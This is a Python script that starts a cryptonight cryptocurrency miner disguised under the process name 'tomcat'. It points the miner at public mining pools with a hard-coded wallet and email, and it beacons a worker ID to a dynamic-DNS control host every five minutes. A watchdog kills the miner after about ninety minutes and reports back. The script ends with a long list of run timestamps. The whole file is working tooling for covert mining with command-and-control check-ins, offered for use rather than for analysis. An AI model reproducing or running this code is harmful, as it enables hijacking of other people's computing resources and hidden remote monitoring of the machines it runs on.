import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:25:06.221045
#2018-02-17 17:13:05.372911
#2018-02-17 19:01:05.456471
#2018-02-17 20:48:06.804887
#2018-02-17 22:35:08.316588
#2018-02-18 00:19:05.683470
#2018-02-18 02:09:06.145064
#2018-02-18 03:56:03.597514
#2018-02-18 05:46:01.768387
#2018-02-18 07:38:04.185062
#2018-02-18 09:24:07.204142
#2018-02-18 11:10:07.192396
#2018-02-18 12:57:06.936148
#2018-02-18 14:44:05.939146
#2018-02-18 16:32:06.804624
#2018-02-18 18:21:05.140559
#2018-02-18 20:06:03.884636
#2018-02-18 21:52:05.252877
#2018-02-18 23:41:06.066322
#2018-02-19 01:27:03.641997
#2018-02-19 03:15:09.019880
#2018-02-19 05:02:01.990576
#2018-02-19 06:46:08.461798
#2018-02-19 08:35:01.404621
#2018-02-19 10:24:04.175039
#2018-02-19 12:12:01.383224
#2018-02-19 13:59:04.534181
#2018-02-19 15:49:08.076535
#2018-02-19 17:37:01.548193
#2018-02-19 19:24:08.342733
#2018-02-19 21:12:07.050318
#2018-02-19 22:58:03.498484
#2018-02-20 00:41:08.172933
#2018-02-20 02:29:07.397112
#2018-02-20 04:20:01.710678
#2018-02-20 06:04:01.551546
#2018-02-20 07:49:07.414596
#2018-02-20 09:35:01.472311
#2018-02-20 11:19:05.925885
#2018-02-20 13:05:11.672372
#2018-02-20 14:50:07.409355
#2018-02-20 16:36:09.004955
#2018-02-20 18:23:06.541865
#2018-02-20 20:14:04.333502
#2018-02-20 22:00:10.834343
#2018-02-20 23:41:02.045891
#2018-02-21 01:25:07.727917
#2018-02-21 03:14:04.636547
#2018-02-21 05:02:01.719560
#2018-02-21 06:50:04.322091
#2018-02-21 08:37:06.151376
#2018-02-21 10:23:01.589351
#2018-02-21 12:10:10.365376
#2018-02-21 14:00:12.084142
#2018-02-21 15:46:09.874070
#2018-02-21 17:38:02.226684
#2018-02-21 19:25:09.688485
#2018-02-21 21:15:09.275547
#2018-02-21 23:03:07.067249
#2018-02-22 00:52:02.204036
#2018-02-22 02:39:04.607149
#2018-02-22 04:26:01.898271
#2018-02-22 06:12:05.229759
#2018-02-22 07:58:02.218669
#2018-02-22 09:46:08.205327
#2018-02-22 11:31:04.469994
#2018-02-22 13:19:04.417475
#2018-02-22 15:08:04.026721
#2018-02-22 16:51:06.777767
#2018-02-22 18:39:03.620076
#2018-02-22 20:32:06.080782
#2018-02-22 22:17:04.843299
#2018-02-23 00:03:06.565440
#2018-02-23 01:50:10.025126
#2018-02-23 03:38:03.979918
#2018-02-23 05:22:07.380325
#2018-02-23 07:08:08.205152
#2018-02-23 08:59:01.265360
#2018-02-23 11:16:01.260608
#2018-02-23 13:09:09.781554
#2018-02-23 14:53:09.195373
#2018-02-23 16:43:08.762407
#2018-02-23 18:30:01.614954
#2018-02-23 20:14:01.844587
#2018-02-23 22:03:05.593138
#2018-02-23 23:51:05.372066
#2018-02-24 01:41:04.998632
#2018-02-24 03:31:05.075164
#2018-02-24 05:15:08.975141
#2018-02-24 07:03:05.455075
#2018-02-24 08:38:03.741524
#2018-02-24 10:09:03.464190
#2018-02-24 11:57:01.727697
#2018-02-24 13:24:02.002981
#2018-02-24 14:55:03.909797
#2018-02-24 16:29:01.609099
#2018-02-24 18:05:09.622039
#2018-02-24 19:35:06.057493
#2018-02-24 21:11:05.342693
#2018-02-24 23:18:03.852256
#2018-02-25 01:37:02.058621
#2018-02-25 04:56:03.888502
#2018-02-25 09:20:01.608800